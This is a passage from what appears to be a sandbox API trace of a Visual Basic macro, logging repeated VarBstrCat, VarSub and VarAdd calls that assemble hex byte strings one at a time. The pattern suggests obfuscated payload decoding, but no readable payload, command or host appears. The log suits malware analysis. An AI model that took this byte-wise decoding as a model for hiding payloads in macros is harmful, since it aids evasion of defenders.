pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.587] VarBstrCat (in: bstrLeft="&H8", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.588] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.588] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.588] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.588] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.588] VarBstrCat (in: bstrLeft="&H5", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.588] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.588] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.588] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.588] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.588] VarBstrCat (in: bstrLeft="&H9", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.588] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.588] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.588] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.588] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.589] VarBstrCat (in: bstrLeft="&H8", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.589] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.589] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.589] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.589] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.589] VarBstrCat (in: bstrLeft="&H6", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.589] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.589] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.589] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.589] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.589] VarBstrCat (in: bstrLeft="&H9", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.589] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.589] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.589] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.590] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.590] VarBstrCat (in: bstrLeft="&H1", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.590] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.590] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.590] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.590] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.590] VarBstrCat (in: bstrLeft="&H7", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.590] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.590] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.590] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.590] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.590] VarBstrCat (in: bstrLeft="&He", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.590] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.591] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.591] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.591] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.591] VarBstrCat (in: bstrLeft="&H2", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.591] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.591] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.591] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.591] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.591] VarBstrCat (in: bstrLeft="&H4", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.591] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.591] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.591] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.591] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.591] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.592] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.592] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.592] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.592] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.592] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.592] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.592] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.592] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.592] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.592] VarBstrCat (in: bstrLeft="&H7", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.592] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.592] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.592] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.593] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.593] VarBstrCat (in: bstrLeft="&H1", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.593] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.593] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.593] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.593] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.593] VarBstrCat (in: bstrLeft="&H3", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.593] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.593] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.593] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.593] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.593] VarBstrCat (in: bstrLeft="&H6", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.593] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.593] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.594] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.594] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.594] VarBstrCat (in: bstrLeft="&H8", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.594] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.594] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.594] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.594] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.594] VarBstrCat (in: bstrLeft="&H4", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.594] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.594] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.594] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.594] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.594] VarBstrCat (in: bstrLeft="&H1", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.594] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.595] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.595] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.643] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.643] VarBstrCat (in: bstrLeft="&H2", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.643] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.644] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.644] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.644] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.644] VarBstrCat (in: bstrLeft="&He", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.644] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.644] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.644] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.644] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.644] VarBstrCat (in: bstrLeft="&H1", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.644] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.644] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.644] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.644] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.644] VarBstrCat (in: bstrLeft="&He", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.644] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.645] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.645] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.645] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.645] VarBstrCat (in: bstrLeft="&Hc", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.645] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.645] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.645] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.645] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.645] VarBstrCat (in: bstrLeft="&H4", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.645] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.645] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.645] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.645] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.645] VarBstrCat (in: bstrLeft="&H5", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.645] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.646] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.646] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.646] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.646] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.646] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.646] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.646] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.646] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.646] VarBstrCat (in: bstrLeft="&H1", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.646] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.646] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.646] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.646] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.646] VarBstrCat (in: bstrLeft="&H6", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.646] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.646] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.646] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.647] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.647] VarBstrCat (in: bstrLeft="&H8", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.647] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.647] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.647] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.647] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.647] VarBstrCat (in: bstrLeft="&H5", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.647] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.647] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.647] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.647] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.647] VarBstrCat (in: bstrLeft="&Hd", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.647] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.647] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.647] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.647] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.647] VarBstrCat (in: bstrLeft="&H8", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.648] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.648] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.648] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.648] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.648] VarBstrCat (in: bstrLeft="&Hf", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.648] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.648] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.648] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.648] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.648] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.648] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.648] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.648] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.648] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.648] VarBstrCat (in: bstrLeft="&He", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.648] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.648] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.648] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.649] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.649] VarBstrCat (in: bstrLeft="&H0", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.649] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.649] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.649] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.649] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.649] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.649] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.649] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.649] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.649] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.649] VarBstrCat (in: bstrLeft="&H7", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.649] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.649] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.649] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.649] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.650] VarBstrCat (in: bstrLeft="&H1", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.650] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.650] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.650] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.650] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.650] VarBstrCat (in: bstrLeft="&Hd", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 